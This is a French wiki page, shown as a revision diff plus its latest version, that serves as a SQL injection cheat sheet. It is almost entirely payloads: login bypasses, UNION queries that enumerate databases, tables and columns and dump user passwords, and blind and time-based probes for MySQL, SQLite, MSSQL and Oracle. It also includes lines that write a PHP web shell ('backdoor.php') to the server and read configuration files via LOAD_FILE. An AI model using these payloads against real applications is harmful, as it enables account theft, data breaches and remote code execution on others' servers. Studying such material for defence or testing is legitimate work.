« 1.1 Injection SQL » : différence entre les versions

De UnixWiki
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
 
Aucun résumé des modifications
 
(Une version intermédiaire par le même utilisateur non affichée)
Ligne 29 : Ligne 29 :
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(schema_name)FROM information_schema.schemata)2,3/*pass=toto
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(schema_name)FROM information_schema.schemata)2,3/*pass=toto
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL, NULL, NULL, SCHEMA_NAME AS `Database` FROM INFORMATION_SCHEMA.SCHEMATA WHERE '1
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL, NULL, NULL, SCHEMA_NAME AS `Database` FROM INFORMATION_SCHEMA.SCHEMATA WHERE '1


Lister les tables
Lister les tables
Ligne 36 : Ligne 37 :
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema LIKE 'vuln_php'),2,3/*&pass=toto
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema LIKE 'vuln_php'),2,3/*&pass=toto
http://toto.com/Fonctions/test.php?id=0' UNION SELECT null,null,null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database() OR '1
http://toto.com/Fonctions/test.php?id=0' UNION SELECT null,null,null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database() OR '1
http://toto.com/Fonctions/test.php?id=0hulk’ union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()#


Afficher les champs
Afficher les champs
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema LIKE 'vuln_php' AND table_name LIKE 'writers'),2,3/*&pass=toto
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema LIKE 'vuln_php' AND table_name LIKE 'writers'),2,3/*&pass=toto
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL ,NULL, NULL, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = database() AND TABLE_NAME='Users
http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL ,NULL, NULL, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = database() AND TABLE_NAME='Users
http://toto.com/Fonctions/test.php?id=hulk’ union select 1,group_concat(column_name, 0x0a),3,4,5,6,7 from information_schema.columns where table_name=”users”#


Afficher les valeurs
Afficher les valeurs
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(password)FROM writers)2,3/*&pass=toto
http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(password)FROM writers)2,3/*&pass=toto
http://toto.com/ident.php?login=hulk’ union select 1,login,password,email,secret,6,7 from users#


Sauvegarder dans un fichier INTO OUTFILE et INTO DUMPFILE (et lancer du code PHP en même temps)
Sauvegarder dans un fichier INTO OUTFILE et INTO DUMPFILE (et lancer du code PHP en même temps)
Ligne 111 : Ligne 115 :
Recherche de la longueur du pass:
Recherche de la longueur du pass:
'UNION SELECT username,password FROM users WHERE username='admin' AND LENGTH(password) > 4 --
'UNION SELECT username,password FROM users WHERE username='admin' AND LENGTH(password) > 4 --

== Time based injection ==

Mysql
admin' and sleep(30)#

Microsoft SQL
admin' waitfor delay '00:00:10'--

Oracle
BEGIN DBMS_LOCK.SLEEP(15); END;

Dernière version du 27 septembre 2016 à 20:49

Injecter

 OR 'a'='a ou '1 or '1'='1
 Smitch' OR '1'='1 
 Smitch' OR 1=1 OR 'a'='a

Pour que la requète SQL devienne

 SELECT login FROM users WHERE login='Smitch' OR 'a'='a' AND password='test123'OR 'a'='a'
 SELECT * FROM notice WHERE id='0' UNION SELECT NULL,NULL,NULL,User()

ou 'OR 1=1# en mot de passe, tous ce qui est derrière le # est ignoré.

Avec un commentaire:

 http://toto.com/ident.php?login='/*&pass=*/or+'1'='1

Recherche du nombre de champ dans la requête

 http://toto.com/ident.php?login='ORDER BY 3/*&pass=toto  ou
 http://toto.com/test.php?id=1' UNION SELECT 1,2,3,'4

Si la requête tombe en erreur c'est que l'on a dépassé le nombre de champ

Recherche de l'ID

 http://toto.com/ident.php?login=' AND 1=2 UNION SELECT 1,2,3/*&pass=toto

Affichage de la version de Mysql

 http://toto.com/ident.php?login=' AND 1=2 UNION SELECT @@version,2,3/*&pass=toto
 http://toto.com/test.php?id=0' UNION SELECT @@version,1,'2 

Recherche des bases

   http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(schema_name)FROM information_schema.schemata)2,3/*pass=toto
   http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL, NULL, NULL, SCHEMA_NAME AS `Database` FROM INFORMATION_SCHEMA.SCHEMATA WHERE '1
   

Lister les tables

 -1 UNION SELECT null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database();--
 -1 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema=database()),null
 
 http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(table_name)FROM information_schema.tables WHERE table_schema LIKE 'vuln_php'),2,3/*&pass=toto
 http://toto.com/Fonctions/test.php?id=0' UNION SELECT null,null,null,TABLE_NAME FROM information_schema.TABLES WHERE TABLE_SCHEMA = database() OR '1
 http://toto.com/Fonctions/test.php?id=0hulk’ union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()#

Afficher les champs

 http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_schema LIKE 'vuln_php' AND table_name LIKE 'writers'),2,3/*&pass=toto
 http://toto.com/Fonctions/test.php?id=0' UNION SELECT NULL ,NULL, NULL, COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = database() AND TABLE_NAME='Users
 http://toto.com/Fonctions/test.php?id=hulk’ union select 1,group_concat(column_name, 0x0a),3,4,5,6,7 from information_schema.columns where table_name=”users”#

Afficher les valeurs

 http://toto.com/ident.php?login=' AND 1=2 UNION SELECT (SELECT GROUP_CONCAT(password)FROM writers)2,3/*&pass=toto
 http://toto.com/ident.php?login=hulk’ union select 1,login,password,email,secret,6,7 from users#

Sauvegarder dans un fichier INTO OUTFILE et INTO DUMPFILE (et lancer du code PHP en même temps)

 SELECT '<? system($cmd); ?>' FROM existant_table INTO DUMPFILE '/path/to/website/backdoor.php'
 SELECT * FROM notice WHERE id='0' UNION SELECT null, '<?php system(\$_GET[cmd]) ?>' INTO OUTFILE '/tmp/toto.php' 

Lire un fichier

 SELECT LOAD_FILE('/complete/path/file2.txt')

Lire et copier un fichier

 SELECT LOAD_FILE('/complete/path/config.php') FROM existant_table INTO OUTFILE '/complete/path/config.txt'

UNION

 http://toto.com/test.php?id=0' UNION SELECT id,Login,PASSWORD FROM Users WHERE '1 donne la requête
 SELECT * FROM notice WHERE id='0' UNION SELECT id,Login,PASSWORD FROM Users WHERE '1'

Lors d'un UNION si les deux champs union ne sont pas du même type integer <- string les convertir grâce a: SELECT CONV(mpass,36,10)

 SELECT mid FROM membres WHERE mid=4 UNION SELECT CONV(mpass,36,10) FROM membres WHERE mid=5

On peut concaténer 2 champs avec la fonction CONCAT(mlogin,char(58),char(58),memail)

 SELECT * FROM admin WHERE alogin='webmaster' UNION SELECT mid,CONCAT(mlogin,char(58),char(58),memail),mpass,mnewsletter FROM membres WHERE mlogin='Franck'

Faire en sorte que la première requête ne renvoi rien (mid=-1 ou mid=5 OR 1=0 UNION SELECT apass FROM admin WHERE aid=1)

 SELECT mlogin FROM membres WHERE mid=-1 UNION SELECT apass FROM admin WHERE aid=1
 SELECT mlogin FROM membres WHERE mid=-1 UNION SELECT apass FROM admin WHERE aid=1 INTO OUTFILE '/path/apass.txt'



Recherche en aveugle

Utiliser la fonction IF de mysql et la dichotomie

 IF(10, 0, 666) (Si c'est on renvoit 666, sinon 0)

ex:

  http://toto.com/ident.php?login=' AND IF((SELECT COUNT(*) FROM information_schema.SCHEMATA)>100,0(SELECT table_name FROM information_schema.TABLES))/*&pass=ds

Blind MySQL injection

Recherche de mot de passe caractère par caractère

 profile.php?user_id=1 AND substr(password,0,1)= 0×66


Injection sous SQLite

Afficher la version de SQLite

 'UNION SELECT sqlite_version(),2

Trouver les noms des bases de données

 'UNION SELECT name,2 FROM sqlite_master WHERE type = "table"--

Renvoit: news,users

Trouver le nom des champs:

 'UNION SELECT sql,2 FROM sqlite_master WHERE tbl_name = 'users' AND type = 'table'--

Renvoit: CREATE TABLE users(username TEXT, password TEXT, Year INTEGER) (2)

Afficher les champs :

 'UNION SELECT username,password FROM users--

Blind SQLite injection

Recherche du premier caractère du login

 'UNION SELECT username,password FROM users WHERE substr(username,0,1)= 'a'--

Recherche de la longueur du pass:

 'UNION SELECT username,password FROM users WHERE username='admin' AND LENGTH(password) > 4 --

Time based injection

Mysql

 admin' and sleep(30)#

Microsoft SQL

 admin' waitfor delay '00:00:10'--

Oracle

 BEGIN DBMS_LOCK.SLEEP(15); END;